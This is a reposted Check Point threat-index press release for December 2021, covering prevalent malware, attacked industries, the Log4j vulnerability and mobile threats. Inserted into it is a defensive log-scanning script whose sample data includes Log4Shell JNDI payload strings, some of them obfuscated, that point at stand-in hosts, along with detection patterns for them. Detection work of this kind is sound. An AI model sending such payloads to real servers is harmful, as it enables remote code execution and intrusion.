December 2021: The most common malware

Check Point Research (CPR), the Threat Intelligence research arm of Check Point Software Technologies Ltd., a provider of cyber security solutions, has published its Global Threat Index for December 2021.

In a month in which the Apache Log4j vulnerability swept across the internet, the researchers report that Trickbot is still the most prevalent malware, albeit with a slightly lower impact: it affected 4% of organizations worldwide, down from 5% in November. Emotet has also bounced back, quickly rising from seventh to second place. CPR also reports that the most attacked industry continues to be Education/Research.


In December, "Apache Log4j Remote Code Execution" was the most frequently exploited vulnerability, affecting 48.3% of organizations worldwide. The vulnerability was first reported on 9 December in the Apache Log4j logging package, the most popular Java logging library, which is used in many internet services and applications and has over 400,000 downloads from its GitHub project. The vulnerability triggered a new wave of attacks that affected almost half of all companies worldwide within a very short time. Attackers are able to exploit vulnerable applications to run cryptojackers and other malware on compromised servers. So far most attacks have focused on cryptocurrency mining at the victims' expense, but more sophisticated actors have begun to act aggressively and exploit the flaw against high-value targets.

"Log4j dominated the cybersecurity news in December. This is one of the most serious vulnerabilities we have ever seen, and because of the complexity of repairing it and its ease of use, it is likely to remain with us for many years, unless companies take immediate steps to prevent attacks," said Maya Horowitz, Vice President of Research at Check Point Software.

"The same month we also saw the Emotet botnet move from seventh to second place among the most common malware. Just as we suspected, Emotet did not take long to lay a solid foundation after its reappearance last November. It is deceptive and spreads quickly through phishing emails with malicious attachments or links. It is now more important than ever for everyone to have a strong email security solution and to ensure that users know how to identify a suspicious message or attachment."

CPR reports that Education/Research was the most attacked industry worldwide in December, followed by Government/Military and ISP/MSP. "Apache Log4j Remote Code Execution" is the most frequently exploited vulnerability, affecting 48.3% of organizations worldwide, followed by "Web Server Exposed Git Repository Information Disclosure", which affects 43.8% of organizations worldwide. "HTTP Headers Remote Code Execution" remains in third place on the list of most frequently exploited vulnerabilities, with a global impact of 41.5%.

Top malware families


This month, Trickbot is the most widespread malware, affecting 4% of organizations worldwide, followed by Emotet and Formbook, both with a global impact of 3%.

  1. Trickbot - Trickbot is a modular Botnet and Banking Trojan that is constantly updated with new capabilities, features and distribution channels. This makes Trickbot a flexible and customizable piece of malware that can be distributed as part of multi-purpose campaigns.
  2. Emotet - Emotet is an advanced, self-propagating and modular Trojan. Emotet was once used as a banking Trojan, but has recently been used as a distributor of other malware or malware campaigns. It uses multiple methods to maintain persistence, and evasion techniques to avoid detection. Additionally, it can spread through phishing spam messages that contain malicious attachments or links.
  3. Formbook - Formbook is an InfoStealer that harvests credentials from various web browsers, captures screenshots, monitors and logs keystrokes, and can download and execute files according to commands from its C&C.

Top attacked industries worldwide:

This month, Education/Research is the industry with the most attacks worldwide, followed by Government/Military and ISP/MSP.

  1. Education/Research
  2. Government/Military
  3. ISP/MSP

Top exploited vulnerabilities

In December, "Apache Log4j Remote Code Execution" is the most commonly exploited vulnerability, affecting 48.3% of organizations worldwide, followed by "Web Server Exposed Git Repository Information Disclosure", which affects 43.8% of organizations worldwide. "HTTP Headers Remote Code Execution" remains third on the list of most frequently exploited vulnerabilities, with a global impact of 41.5%.

  1. Apache Log4j Remote Code Execution (CVE-2021-44228) - A remote code execution vulnerability exists in Apache Log4j. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.
  2. Web Server Exposed Git Repository Information Disclosure - An information disclosure vulnerability was reported in Git Repository. Successful exploitation of this vulnerability could allow unintentional disclosure of account information.
  3. HTTP Headers Remote Code Execution (CVE-2020-10826, CVE-2020-10827, CVE-2020-10828, CVE-2020-13756) - HTTP headers let the client and the server pass additional information along with an HTTP request. A remote attacker may use a vulnerable HTTP header to execute arbitrary code on the victim's machine.
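To make the two leading entries in this table (and the Log4j discussion above) concrete for a defender, here is an added example that is not part of the press release and not Check Point's code. It sweeps web-server access logs for the probes behind both: Log4Shell lookup strings, including the URL-encoded and `${lower:...}` / `${::-...}` obfuscations used to dodge naive `jndi` string matching, and requests for `/.git/` paths, where a 200 response on `/.git/*` means the repository is actually being served rather than merely probed. The log lines are constructed samples in Apache/nginx combined format using TEST-NET addresses; the finding categories and field names are this example's own choices.

```python
"""Sweep access logs for Log4Shell (CVE-2021-44228) probes and exposed-.git
requests. Added example for this article; not Check Point's code. The log
lines below are constructed samples, not real traffic."""
import re
from typing import Dict, List
from urllib.parse import unquote

# Constructed sample log lines in Apache/nginx "combined" format.
SAMPLE_LOG = """\
203.0.113.10 - - [10/Dec/2021:14:02:11 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.11 - - [10/Dec/2021:14:02:12 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.99:1389/a}"
203.0.113.12 - - [10/Dec/2021:14:02:13 +0000] "GET /?x=${${lower:j}ndi:${lower:r}mi://203.0.113.99/o} HTTP/1.1" 200 512 "-" "curl/7.68.0"
203.0.113.13 - - [10/Dec/2021:14:02:14 +0000] "GET /.git/HEAD HTTP/1.1" 200 23 "-" "python-requests/2.25"
203.0.113.14 - - [10/Dec/2021:14:02:15 +0000] "GET /.git/config HTTP/1.1" 404 196 "-" "python-requests/2.25"
203.0.113.15 - - [10/Dec/2021:14:02:16 +0000] "GET /%24%7Bjndi%3Adns%3A%2F%2Fexample.invalid%2Fx%7D HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

# One combined-format line: ip ident user [ts] "method path proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Log4j 2 lookups attackers nest around the keyword to hide "jndi":
#   ${lower:j} / ${upper:J}  -> j          ${::-j} / ${env:X:-j} -> j
CASE_LOOKUP = re.compile(r'\$\{(?:lower|upper):([^${}]*)\}', re.IGNORECASE)
DEFAULT_LOOKUP = re.compile(r'\$\{[^${}]*:-([^${}]*)\}')
JNDI = re.compile(r'\$\{jndi:')


def normalize_lookup(value: str) -> str:
    """Undo URL encoding and the common lookup-based obfuscations.
    Iterates to a fixed point (bounded) so nested and double-encoded
    payloads collapse to the plain ${jndi:...} form."""
    s = value
    for _ in range(5):
        before = s
        s = unquote(s)
        s = CASE_LOOKUP.sub(r'\1', s)
        s = DEFAULT_LOOKUP.sub(r'\1', s)
        if s == before:
            break
    return s.lower()


def scan_line(line: str) -> List[Dict]:
    """Return findings for one log line (empty list if benign/unparseable)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    rec = m.groupdict()
    status = int(rec['status'])
    findings: List[Dict] = []
    # 1. Log4Shell: any request field an application might hand to Log4j
    #    (path, Referer, User-Agent) is an injection point.
    for field in ('path', 'referer', 'ua'):
        norm = normalize_lookup(rec[field])
        if JNDI.search(norm):
            findings.append({'ip': rec['ip'], 'kind': 'log4shell_probe',
                             'field': field, 'status': status, 'evidence': norm})
            break
    # 2. Exposed .git: a 200 on /.git/* means the repository is downloadable;
    #    anything else is just a probe worth noting.
    path = unquote(rec['path']).split('?', 1)[0]
    if path.startswith('/.git/'):
        findings.append({'ip': rec['ip'],
                         'kind': 'git_exposed' if status == 200 else 'git_probe',
                         'field': 'path', 'status': status, 'evidence': path})
    return findings


def scan_log(text: str) -> List[Dict]:
    """Scan a whole log (one request per line) and collect all findings."""
    out: List[Dict] = []
    for line in text.splitlines():
        if line.strip():
            out.extend(scan_line(line))
    return out


if __name__ == '__main__':
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']:15} {f['kind']:16} {f['status']} {f['field']}={f['evidence']}")
```

Run as a script it prints five findings from the sample: three Log4Shell probes (one carried in the User-Agent, one hidden with `${lower:...}`, one URL-encoded), one exposed repository (`/.git/HEAD` answered with 200) and one plain probe (`/.git/config` answered with 404). Feed real logs to `scan_log()`; the 200 on `/.git/*` is the signal that the repository, and whatever credentials its history contains, is actually downloadable, which is the information-disclosure case in the table.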

Top Malicious Mobile Apps

AlienBot ranks first among the most prevalent malware on mobile, followed by xHelper and FluBot.

  1. AlienBot - The AlienBot malware family is a Malware-as-a-Service (MaaS) for Android devices that allows a remote attacker, as a first step, to inject malicious code into legitimate financial applications. The attacker gains access to the victims' accounts and eventually takes full control of their device.
  2. xHelper - A malicious application, seen in the wild since March 2019, used to download other malicious applications and display ads. The application is capable of hiding itself from the user and can even reinstall itself after it has been uninstalled.
  3. FluBot - FluBot is an Android botnet distributed via SMS phishing (smishing), most often impersonating delivery companies. As soon as the user clicks the link in the message, FluBot is installed and gains access to all the sensitive information on the phone.

The most common malware threats in Greece for December 2021 are:

Formbook - FormBook was first identified in 2016 and is an InfoStealer targeting the Windows operating system. It is marketed as MaaS in underground hacking forums for its powerful evasion techniques and relatively low price. FormBook harvests credentials from various web browsers, captures screenshots, monitors and logs keystrokes, and can download and execute files as instructed by its C&C.

Emotet - Emotet is an advanced, self-propagating and modular Trojan that was once used as a banking Trojan and now distributes other malware or malicious campaigns. Emotet uses multiple methods to maintain persistence, and evasion techniques to avoid detection, and can spread through spam emails that contain malicious attachments or links.

AgentTesla - AgentTesla is an advanced RAT (Remote Access Trojan) that acts as a keylogger and password stealer. Active since 2014, AgentTesla can monitor and collect the victim's keyboard input and clipboard, capture screenshots and exfiltrate credentials for a variety of software installed on the victim's machine (including Google Chrome, Mozilla Firefox and the Microsoft Outlook email client). AgentTesla is sold openly as a legitimate RAT, with customers paying $15 to $69 for licenses.

Trickbot - Trickbot is a modular Botnet and Banking Trojan that targets the Windows platform and is distributed mainly through spam campaigns or other malware families such as Emotet. Trickbot sends information about the infected system and can also download and execute arbitrary modules from a wide range of available ones: from a VNC module for remote control to an SMB module for propagation within a compromised network.

Once a machine is infected, the Trickbot gang, the threat actors behind this malware, use this wide range of modules not only to steal banking credentials from the target computer, but also to move laterally and perform reconnaissance within the target organization before launching a targeted ransomware attack across the company.

Joker - An Android spyware found on Google Play, designed to steal SMS messages, contact lists and device information. Additionally, the malware silently signs the victim up for premium services on advertising sites.

Dridex - Dridex is a banking Trojan targeting the Windows platform, distributed through spam campaigns and exploit kits, which relies on WebInjects to intercept and redirect banking credentials to an attacker-controlled server. Dridex contacts a remote server, sends information about the infected system, and can also download and execute additional modules for remote control.

Vidar - Vidar is an infostealer targeting Windows operating systems. First detected in late 2018, it is designed to steal passwords, credit card data and other sensitive information from various web browsers and digital wallets. Vidar has been sold on various online forums and is used as a malware dropper that downloads GandCrab ransomware as a secondary payload.

Cryptbot - Cryptbot is a Trojan that infects systems by installing a rogue VPN program and steals stored browser credentials.

Teabot - Teabot is an Android Trojan used in phishing attacks. Once installed on the compromised device, it can stream the screen live to the attacker and abuse Accessibility Services to perform other malicious activities.

Triada - Triada is a modular backdoor for Android that grants super-user privileges to downloaded malware. Triada has also been observed tampering with URLs loaded in the browser.

XMRig - XMRig, first seen in May 2017, is open-source CPU mining software used to mine the Monero cryptocurrency.


Check Point's Global Threat Impact List and ThreatCloud Map are based on the company's ThreatCloud intelligence, the largest collaborative network for fighting cybercrime, which delivers threat data and attack trends from a global network of threat sensors.

The ThreatCloud database inspects over 3 billion websites and 600 million files daily and identifies more than 250 million malware activities every day.

The full list of the top 10 malware families in December can be found on the Check Point blog.


Written by newsbot

Although press releases here range from very selective to rare, I decided to run this one... because sometimes the authors are hiding.
